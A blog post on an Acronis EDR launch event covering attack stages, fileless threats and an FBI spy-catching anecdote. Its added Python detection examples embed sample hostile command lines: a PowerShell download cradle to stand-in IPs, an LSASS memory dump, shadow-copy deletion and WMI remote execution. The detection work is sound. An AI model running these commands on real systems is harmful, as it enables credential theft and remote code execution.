How Adopting EDR Helps Us to Think Like Spies and Cyber Criminals


When it comes to cybersecurity defences, an endpoint on which a threat goes undetected is an open door into your network. That’s why today’s MSPs need to understand EDR.

Endpoints are the devices that connect to your network: laptops, desktops, mobile phones, servers, switches, point-of-sale terminals, IoT (Internet of Things) devices, printers and more.

EDR (Endpoint Detection and Response) is a security toolkit that continuously records activity on these endpoints, allowing you to detect, isolate, fix and remove threats or unauthorised access, both when they first attempt to penetrate your system and after they have gained a foothold.

Cybersecurity experts Acronis held a media event to promote the launch of their new EDR solution that integrates with their Cyber Protect Cloud product.


State of the Threat Landscape

To kick things off, Candid Wuest, Vice President of Research at Acronis, provided us with an update on the current security threat landscape, to remind us of the types of attacks we’re seeing most at the moment.

Typical attack vectors into our business systems come in 6 different forms:

  1. Malicious Emails: containing malicious attachments, using social engineering, utilising AI to become more sophisticated.
  2. Service Exploits: exploiting a misconfigured or unpatched service, using fileless attacks.
  3. Malicious Websites: exploiting your browser, site redirection/take over or manual downloads.
  4. Known Credentials: brute-force password cracking, credential stuffing or phishing, and access purchased from dropper operators or initial access brokers.
  5. Supply Chain Attacks: vendor compromised, SaaS/MSP takeover or dependency infections.
  6. Human Factor: Insider help, physical access, or human error/complexity issue.

Once the attack successfully invades your system, the hackers expand their access to achieve their goals.

This can include:

  • Deploying Tools: ransomware, infostealers and other malware, and dual-use or public tools
  • Discovery: finding other workloads to exploit and locating data and confidential information, including reading emails, internal wikis, etc.
  • Privilege Escalation: obtaining domain administrator privileges, via keyloggers and stolen tokens, using Mimikatz to extract credentials from memory and BloodHound to map paths to privileged accounts
  • Disable/Bypass Defences: force-stop security processes, delete backups and logs, and use living-off-the-land techniques to sustain the attack
  • Lateral Movement: using your own infrastructure to replicate and hide, for example through group policy objects (GPOs) and Windows Management Instrumentation (WMI), or sending spoofed messages to co-workers
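The stages above are exactly what behaviour-based EDR telemetry is built to catch: not a file on disk, but the process lineage and command lines that each stage leaves behind. As an added example (not code from the Acronis talk or product), here is a small Python rule set run over constructed process-creation records of the kind a sensor or Sysmon Event ID 1 logs. Hostnames, users and paths are hypothetical; the command lines use the real syntax of the tools named above. It flags one event per stage and recommends isolating a host once several stages have fired there, which is the 'respond' half of EDR.

```python
"""Behaviour-based detection over process-creation telemetry.

Added example, not Acronis code. Every event below is a CONSTRUCTED record
shaped like the fields an EDR sensor (or Sysmon Event ID 1) logs for each new
process. Hostnames, users and paths are hypothetical; the command lines use
the real syntax of the tools named in the stages above.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    event_id: int
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


# (stage from the list above, rule name, pattern over the command line)
RULES = [
    ("Discovery", "Domain admin recon via net/nltest",
     re.compile(r'\b(net1?\s+group\s+"?domain admins"?|nltest\s+/dclist)', re.I)),
    ("Privilege Escalation", "LSASS memory dump (credential theft)",
     re.compile(r"procdump.*lsass|comsvcs\.dll.*minidump|mimikatz|sekurlsa", re.I)),
    ("Disable/Bypass Defences", "Shadow copy (backup) deletion",
     re.compile(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete", re.I)),
    ("Disable/Bypass Defences", "Windows event log cleared",
     re.compile(r"wevtutil\s+(cl|clear-log)\b", re.I)),
    ("Disable/Bypass Defences", "Defender real-time protection disabled",
     re.compile(r"set-mppreference.*-disablerealtimemonitoring\s+\$?true", re.I)),
    ("Lateral Movement", "Remote process creation via WMI",
     re.compile(r"wmic.*/node:.*process\s+call\s+create", re.I)),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(ev: ProcessEvent) -> List[Tuple[str, str]]:
    """Return (stage, rule) pairs that fire on one event.

    Process lineage is checked as well as the command line: an Office
    application spawning a shell is the classic sign of a malicious email
    attachment, whatever the shell was asked to run.
    """
    hits = []
    if basename(ev.parent_image) in OFFICE_APPS and basename(ev.image) in SHELLS:
        hits.append(("Malicious Emails", "Office application spawned a shell"))
    for stage, rule, pattern in RULES:
        if pattern.search(ev.command_line):
            hits.append((stage, rule))
    return hits


def triage(events: List[ProcessEvent]) -> List[Tuple[int, str, str, str]]:
    """Run every event through the rules; return (event_id, host, stage, rule)."""
    return [(ev.event_id, ev.host, stage, rule)
            for ev in events for stage, rule in evaluate(ev)]


def hosts_to_isolate(events: List[ProcessEvent], min_stages: int = 2) -> Set[str]:
    """Recommend network isolation for hosts where several distinct stages fire.

    A single hit can be an administrator at work; a chain of stages on one
    host is the attacker's tradecraft, and containing that host is the
    'respond' half of EDR.
    """
    stages_by_host: Dict[str, Set[str]] = {}
    for _, host, stage, _ in triage(events):
        stages_by_host.setdefault(host, set()).add(stage)
    return {h for h, s in stages_by_host.items() if len(s) >= min_stages}


# Constructed telemetry: one intrusion chain on WS01, benign admin work elsewhere.
EVENTS = [
    ProcessEvent(1, "WS01", "alice", r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\""),
    ProcessEvent(2, "WS01", "alice", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
                 'net group "domain admins" /domain'),
    ProcessEvent(3, "WS01", "alice", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\l.dmp full"),
    ProcessEvent(4, "WS01", "alice", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\vssadmin.exe",
                 "vssadmin delete shadows /all /quiet"),
    ProcessEvent(5, "WS01", "alice", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe",
                 'wmic /node:FS01 process call create "cmd /c whoami > c:\\temp\\o.txt"'),
    ProcessEvent(6, "WS02", "bob", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\wevtutil.exe",
                 "wevtutil qe Security /c:5 /rd:true"),  # querying, not clearing, the log
    ProcessEvent(7, "SRV01", "svc_backup", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -c Get-MpPreference"),  # reading, not changing, Defender settings
]

if __name__ == "__main__":
    for event_id, host, stage, rule in triage(EVENTS):
        print(f"event {event_id} on {host}: {stage} - {rule}")
    print("isolate:", sorted(hosts_to_isolate(EVENTS)))
```

A real sensor adds a time window and walks the full process tree, but the shape is the same: a single rule hit is a lead, while a chain of stages on one host is the evidence a spy hunter acts on, and the two benign events show why each rule has to be specific about the verb (clearing a log, changing a setting) rather than the tool name.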

The important message here is that the frequency of attacks has scaled up this year, thanks in part to AI tools like ChatGPT.



Why We Need to See Today’s Cybercriminals as Spies

Eric O’Neill, a former FBI Counterintelligence Operative and author of Gray Day, gave a very special keynote speech on how cybercriminals operate in similar ways to spies. And he revealed how he caught a double agent by compromising his endpoint device.

To set the scene of how we’ve got to this point, Eric provided a number of startling statistics.

He described today’s global cybercriminal syndicates as ‘mostly untouchable’ by law enforcement. They operate from the Dark Web using servers in non-extradition countries, and do so with little to no fear of reprisal.

So how did we arrive here?

“We have to mention how the pandemic created a pressure situation, which made us vulnerable,” says Eric, “and even now, more than 50% of the global workforce is still working in a remote or hybrid capacity.” This has led to an adoption of remote-first cloud technology before security providers were ready.

In fact, we have had to adopt new technologies much more quickly than before, technologies that would previously have taken years to roll out. This has opened up the field for cybercriminals to exploit.

According to the FBI’s IC3 (Internet Crime Complaint Center):

  • In 2020, reported cyberattacks cost $4.2bn
  • Around 800,000 internet crime reports were made to the FBI that year, which doesn’t account for those reported globally
  • In 2021, the cost rose to $6.9bn, and in 2022 to $10.3bn. If this trend continues, by the end of 2023 it could be over $15bn
  • Globally, the cost of cybercrime in 2021 was put at $7tn, which would make cybercrime the third biggest economy in the world by GDP

Getting Endpoint Security Right to Counteract Superior Cyber Threats

Why are these cyber syndicates so successful? They’ve learned from the best – foreign intelligence services. Spies. They operate like intelligence services, which makes it so hard to disrupt and stop them.

“In order to combat the cyber syndicates, we have to start thinking like spy hunters!” says Eric.

EDR technology brings security as close to the human as possible: it gives you control over access and detects threats at the device level, managed directly through the cloud. Crucially, the response then happens at the point of origin, the endpoint where the initial breach occurs.

It fits the ‘Zero Trust’ principle of never assuming a device is clean: suspicious behaviour on an endpoint is identified and locked down, allowing you to investigate it before it spreads.


How to Catch a Spy by Compromising his Endpoint Device

Robert Hanssen was a spy working as a supervisory special agent for the FBI and selling secrets to a foreign intelligence service for over 22 years. He was the most damaging spy in US history, and Eric caught him by stealing his Palm Pilot device.

When it was identified that Hanssen might be a spy, they had to get the proof and catch him in the act. Eric spotted that he was never without his PDA, his Palm Pilot. Hanssen would methodically check it often, and so Eric was sure the incriminating evidence was on there somewhere.

Using a diversion, Eric was able to get his quarry to leave his office for long enough for him to steal his PDA, take it to the tech team to copy and return it to where he found it before Hanssen returned.

The tech team explained that the PDA was encrypted, which was suspicious in itself. Two weeks later, Hanssen was arrested just after completing his last drop for his foreign intelligence handlers.

So, in stealing his data, the FBI compromised Special Agent Hanssen’s endpoint, and used the data to extract the time of the meeting to catch him in the act.


Today’s Threats Designed to Avoid Traditional Detection Methods

Todd Cramer, Director of Business Development Security Ecosystems at Intel, highlighted how many of today’s attacks are being designed to avoid detection.

The Challenge of Fileless Attacks

Todd reported a 900% increase in fileless attacks since 2021, with such attacks now accounting for over 70% of all attacks. Fileless attacks run malicious code entirely in memory, leaving no file on disk for a scanner to examine, and they can be difficult for EDRs to detect.

From their foothold in memory, the criminals inject code into legitimate processes so that it runs under a trusted name, and use tools like Cobalt Strike to stage further attacks, including dropping ransomware.
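When nothing lands on disk, the command line recorded at process creation is often the only artefact, and a typical fileless first stage is an encoded PowerShell one-liner that fetches and runs the next stage in memory. As an added Python example (not Intel’s or Acronis’s code), the block below decodes PowerShell -EncodedCommand payloads, which are base64 over UTF-16LE rather than UTF-8, and scores command lines for in-memory execution markers. All command lines are constructed and the URL is a documentation address.

```python
"""Decoding and scoring fileless PowerShell command lines.

Added example, not Acronis or Intel code. A fileless stage commonly arrives as
'powershell -EncodedCommand <base64>' carrying a UTF-16LE script that downloads
and runs the next stage in memory; nothing is written to disk, so the command
line recorded at process creation is often the only artefact. All command
lines below are CONSTRUCTED and the URL is a documentation address.
"""
import base64
import re
from typing import List, Optional

# -e, -ec, -en, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Markers of code being fetched, decoded or executed without touching disk.
IN_MEMORY_INDICATORS = {
    "download cradle": re.compile(r"downloadstring|downloaddata|invoke-webrequest|\biwr\b", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "reflective assembly load": re.compile(r"\[(?:system\.)?reflection\.assembly\]::load", re.I),
    "unmanaged memory API": re.compile(r"virtualalloc|createthread|writeprocessmemory", re.I),
    "compressed payload": re.compile(r"frombase64string.*(?:gzipstream|deflatestream)", re.I),
}


def encode_for_powershell(script: str) -> str:
    """Produce the base64 that -EncodedCommand expects (UTF-16LE, not UTF-8)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -EncodedCommand."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload: PowerShell would reject it too


def score(cmdline: str) -> List[str]:
    """List the indicators that fire, after decoding any encoded payload.

    The indicators are matched against the decoded script, not the base64
    blob. 'encoded command' alone is weak evidence (admin tooling uses it too);
    encoding combined with a download cradle or a reflective load is the
    fileless pattern described above.
    """
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        text = cmdline
    else:
        text = ENCODED_FLAG.sub(" ", cmdline) + " " + decoded
    hits = [name for name, pat in IN_MEMORY_INDICATORS.items() if pat.search(text)]
    if decoded is not None:
        hits.insert(0, "encoded command")
    return hits


STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage1.ps1')"

SAMPLES = [
    # 1. encoded download-and-execute stager: the textbook fileless first stage
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(STAGER),
    # 2. plaintext reflective load of an assembly held only in a variable
    'powershell -nop -c "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b)).EntryPoint.Invoke($null,$null)"',
    # 3. benign scheduled script run from disk
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    # 4. benign but encoded: common in RMM tooling, so flagging it alone is noisy
    "powershell.exe -EncodedCommand " + encode_for_powershell("Get-Service | Where-Object Status -eq 'Running'"),
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(score(cmd) or ["clean"], "<-", cmd[:70])
```

The fourth sample is the point practitioners care about: encoding by itself is how plenty of RMM and deployment tooling invokes PowerShell, so a rule that alerts on -EncodedCommand alone buries the analyst, while a rule that decodes first and looks for a download cradle or reflective load catches the stager and ignores the service check.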



How Acronis EDR fits in with other Acronis Solutions

Solutions Engineer James Erby gave a demonstration of the EDR product to show us how the dashboard works, and how to carry out investigative and remedial actions.

Countering attacks and addressing their impact requires more advanced security tools, not least for regulatory reasons. GDPR, for example, requires a personal data breach to be reported to the supervisory authority within 72 hours of the organisation becoming aware of it, and expects a post-incident analysis to follow.

The process of how EDR works:

  1. Detect security incidents or anomalies
  2. Contain the incident at the endpoint
  3. Investigate security incidents
  4. Provide remediation guidance

EDR is especially useful against zero-day exploits and elusive threats such as fileless attacks and living-off-the-land techniques, which abuse legitimate tools already on the system and so leave no malware file to scan.

How EDR Works with Acronis Cyber Protect Cloud

The EDR package is bundled with the Advanced Security Pack because many of the features require both to be enabled on the customer’s network.

When you go in to manage the protection, you can select devices and see if any incidents have been detected. Here you can also see which modules are active on this device and enable them if they’re not already enabled.

In the protection tab, it will show you all the incidents detected across your network and here you can find out more information about the incident including the severity, what triggered the incident, date and time the incident was reported, etc.

You can further drill into the incident details to see what processes were created as part of the attack, and find detailed information on what each process did to your system.

When it comes to taking response actions on the incident, you can add to the allowlist, in the case of a false positive, or add to the blocklist. You can also delete or quarantine the affected file.

You can also take actions on the affected workload, such as perform a forensic backup for more in-depth analysis later, or recover from a backup.

Overall there is a lot of functionality in this EDR product.

Conclusion

The Acronis EDR is another valuable addition to the Cyber Protect Cloud security solution and is available now.

As the cybercriminal syndicates evolve to be more like spies and intelligence operatives, we have to cleverly adapt to their increasingly sophisticated forms of attack.

Fileless attacks and compromised accounts on devices are a massive risk to your business, and they’re on the rise, so implementing an EDR solution makes perfect sense.

Has your business suffered a fileless attack? Or perhaps you’re trying to sell your customers on the importance of endpoint security? We would love to hear about it in the comments.


STEPHEN MCCORMICK

I'm the MSP Community Manager for Tubblog. A small business owner, technical writer and blogger, with 15 years experience in corporate IT. I frequently attend MSP peer groups and create content relevant to IT service providers and business owners.

